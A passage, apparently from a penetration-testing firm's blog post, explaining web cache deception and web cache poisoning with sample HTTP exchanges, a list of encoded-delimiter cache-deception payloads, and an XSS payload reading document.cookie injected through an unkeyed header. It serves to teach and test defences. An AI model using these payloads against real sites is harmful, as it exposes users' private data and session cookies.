These usually are: </p><span id="docs-internal-guid-2dc0e82f-7fff-47df-318b-e1e34a9a57e5"><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="200"></col><col width="400"></col></colgroup><tbody><tr style="height: 21pt;"><td rowspan="5" style="background-color: #cfe2f3; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">TOP</span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="background-color: transparent; color: #0b5394; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Architecture Gateways</span></p><br /><br /><br /><br /><br /><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">LOW</span><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="background-color: transparent; color: #990000; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Architecture Gateways</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">DNS</span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Load Balancer</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AWS</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">CDN</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Cloudflare, Akamai, Amazon CloudFront</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Reverse Proxy</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Haproxy, AWS, Caddy</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) </span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">CMS</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">OPENCMS, AEM, DRUPAL</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Application Server</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">JBOSS, JETTY</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span></p></td></tr><tr style="height: 21pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Web Server</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">NGINX, TOMCAT, APACHE</span><span style="color: #274e13; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">)</span></p></td></tr></tbody></table></div></span><p>
<br />When different gateways enable <b>conflicting caching rules</b>, the web cache server may prioritize one of the gateways for certain cases. Specifically, this happens when the same web page would be cached by one gateway but not by another one. <br />In these cases, <b><u>a secure configuration of the gateways that are not prioritized is completely useless for the purpose of preventing web caching attacks</u></b>. <br /><br />
To prevent them, it is necessary to ensure that all the active caching mechanisms are properly configured, considering also edge cases in which different mechanisms result in conflicts about what to cache.
<br /><br />
For instance, while performing a security assessment for one of our clients, we faced a web infrastructure in which the <i>Content Management System (CMS)</i> and the web cache server itself had different rules for detecting and caching static files. <br />
The <i>CMS</i> <u>identified</u> static files based on the URL only, thus it could be fooled to treat an API response as an image.
<br />The <i>web cache </i>server<u> did not identify </u>that kind of response as images and so it returned the correct caching headers, aiming not to cache them. <br /><br />
In summary, the flaw was generated by the <i>CMS</i> rules with a higher priority than the web cache server’s ones, leading to a <b>Web Cache Deception Vulnerability</b> (deeply described following).
<br /><br />
The previous scenario is called <b><i>path confusing web cache</i></b>, in that case, it should be paid attention to the “<b><i>vertical order</i></b>” of the components and layers involved in the communication between the two endpoints. <br /><br />
The purpose and the behaviour of the different cache copies related to the components mentioned in the table, as discussed in the beginning of this article, are mostly the same. Differences lie in the <b>physical and logical position </b>of these copies within the space and the architecture of the internet communication itself. Moreover, in the <b>internal configuration</b> related to each component.
</p>
<br />
<h3>Web Cache Attacks</h3>
<p>Beyond the issue of different overlapped web cache configurations, the main impact of a web cache attack is to <i>store a web page with unexpected content</i>. In other words, caching ordinary web pages containing <b>malicious content</b> or<b> users’ sensitive information</b>.<br />
In summary, an insecure cache management could allow the following attacks:
</p><ul>
<li><b>- Web Cache Deception</b>, where the attacker forces the victim to cache their sensitive data;</li>
<li><b>- Web Cache Poisoning</b>, where the attacker poisons a web page and induces the victim to visit it.</li>
</ul>
<br />Overall, these attacks might result in the possibility of exploiting the following scenarios:
<ul>
<li><b><i>- Phishing</i></b></li><li><b><i>- HTML Injection
</i></b></li><li><b><i>- Cross-Site Scripting</i></b></li><li><b><i>- Open Redirect</i></b></li><li><b><i>- Secrets Disclosure</i></b></li>
</ul>
<p></p>
<br />
<h3>Web Cache Deception Attack</h3>
<p>So far so good, but how to perform a “<b>Web Cache Deception Attack</b>“ (<i>WCD</i>) in order to verify if your web application is vulnerable?
<br /><br />
A WCD attack consists in forcing the web server to store victim’s data in a <b>public cache</b> and then access it. The fun part is that this is one of those rare cases in which it is easier done than said.
<br />This attack was firstly documented by Omer Gil in <a href="https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html" target="_blank">2017</a> and <a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf" target="_blank">presented</a> at Black Hat in the same year.
<br /><br />
Let’s consider a web application that provides an API to retrieve the user personal data at the endpoint ‘<i>/my-account/getData.json</i>’. <br />
In a standard configuration, the server would cache web pages based on the response headers. Instead, the application implements a CMS, whose configuration caches web pages based on file extension, disregarding the headers. For this reason, since the response of this API call is JSON data, it does not get cached.
<br /><br />
What if the user calls ‘<i>/my-account/getData.json/<b>test.css</b></i>’? The application processes the request to ‘/getData.json’ and then the CMS caches the response, since it detected a static file extension.
<br /><br />
Request:
<b id="docs-internal-guid-6a1ef538-7fff-687d-b1f0-dd711cbcbadc" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GET /my-account/getData.json/test</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.css</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Host: www.vulndomain.com</span></p></td></tr></tbody></table></div><p><br /> Response: </p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cache-Control: max-age=0, no-cache, no-store</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">{"companyName":"Acme Corp.","userName":"admin","firstName":"Mario",</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">"lastName":"Rossi","email":"mario@acme.com","telephone":"+39 3333333333"}</span></p></td></tr></tbody></table></div><p><br /> It can be noted that the “Cache-Control” header in the response should prevent the server from caching the page, but it still gets stored in a public cache. This is due to the CMS treating the response as a public static file.
<br />Thus, anyone who has access to the same web cache of that user, will be able to access the same content by requesting ‘<i>/my-account/.getData.json/test.css</i>’.
<br />That happens because the subsequent request does not reach the central server (that processes API calls), but stops at a closer edge server, which returns the cached response.
<br /><br />
In other words, to exploit this vulnerability an attacker sends the victim a custom URL which forces the CMS to publicly cache sensitive data once the victim user visits the malicious URL. The malicious user then, accessing the URL he knows, will receive within the response body the victim user’s sensitive information wrongly stored due to the cache flaw.
<br /><br />
Therefore, if the web server is configured to not cache any requests under the directory "<i>/getData.json</i>" and in a second place an admin adds a rule within the reverse-proxy in order to cache JPEG files, an attacker could exploit a <b><i>Web Cache Deception</i></b> attack by confusing the required path (i.e. requiring the resource "<i>/getData.json/..;/a.jpg</i>").
<br /><br />
You should also verify the following payloads (which may fool one of the caching components of your infrastructure) to ensure that your endpoints are properly secured against Web Cache Deception Attacks: <b id="docs-internal-guid-389bdee2-7fff-7ef1-00e1-f9598888b469" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Newline (\n)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%0A</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nonexistent.css </span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Semicolon (;)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%3B</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nonexistent.css</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Pound (#)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%23</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">nonexistent.css</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># Encoded Question Mark (?)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">example.com/account.php</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">%3F</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">name=valnonexistent.css</span></p></td></tr></tbody></table></div><p><br /> Reference: “<a href="https://arxiv.org/pdf/1912.10190.pdf" target="_blank">Cached and Confused: Web Cache Deception in the Wild</a>”.
</p>
<br />
<h3>Web Cache Poisoning Attack</h3>
<p>On the other side, the “<b>Web Cache Poisoning Attack</b>” objective is to <b>add malicious code</b> inside a vulnerable web page and <b>aim the attack</b> at a specific victim since the attacker would know the exact cache keys used to <b>store</b> the malicious web page.
<br /><br />
This attack was firstly documented by James Kettle in 2018 and <a href="https://www.blackhat.com/us-18/briefings/schedule/#practical-web-cache-poisoning-redefining-unexploitable-10200" target="_blank">presented</a> at Black Hat in the same year.
<br /><br />
Within this scenario, the targeted web page is identified with a specific “<i>cache key</i>” which could be, for instance, a<b> nonexistent URL parameter value</b> on a specific path. Indeed, the attacker-controlled web page will be cached on this specific nonexistent parameter value.<br />
Moreover, while in the “<i>Web Cache Deception</i>” scenario it is necessary to detect a vulnerable file extension, this attack also requires the interaction of the web page with a header parameter that is not used as key by the caching server. <br /><br />
For instance, suppose that a malicious user discovers through the BurpSuite extension “<a href="https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943" target="_blank">Param Miner</a>” the hidden “<b>X-Origin-URL</b>” header which is <b>reflected</b> in the response web page and it is <b>not used as cache-key</b>. This header represents an entry point able to exploit a <b>Cross-Site Scripting</b> vulnerability, as shown in the following request.
<br /><br />
Request:
<b id="docs-internal-guid-dcc0c1d3-7fff-0497-53e6-909c1438aaf8" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GET /home/private/projections</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">?insurance=not_existing</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Host: vulnerable-host.com</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accept-Encoding: gzip, deflate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Origin-URL: </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“><img src=x onerror=alert(document.cookie)><!--</span></p></td></tr></tbody></table></div><p><br /></p><p> Response: <b id="docs-internal-guid-aad3475b-7fff-2868-388a-e58b1bf38670" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Content-Type: text/html</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Connection: close</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache: </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MISS</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Content-Length: 3114</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[ . . . ]</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img src=”</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">”><img src=x onerror=alert(document.cookie)><!--</span><span 